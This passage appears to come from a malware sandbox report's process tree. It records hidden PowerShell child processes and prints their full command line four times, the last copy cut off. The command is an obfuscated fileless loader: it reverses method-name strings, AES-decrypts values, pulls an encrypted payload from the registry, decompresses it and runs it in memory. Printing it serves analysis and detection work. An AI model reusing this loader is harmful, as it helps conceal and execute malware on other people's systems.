        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious use of SetThreadContext
        
        PID:5756
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6048).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4308
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6048).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5252
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6048).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious use of SetThreadContext
        
        PID:6360
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6048).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join 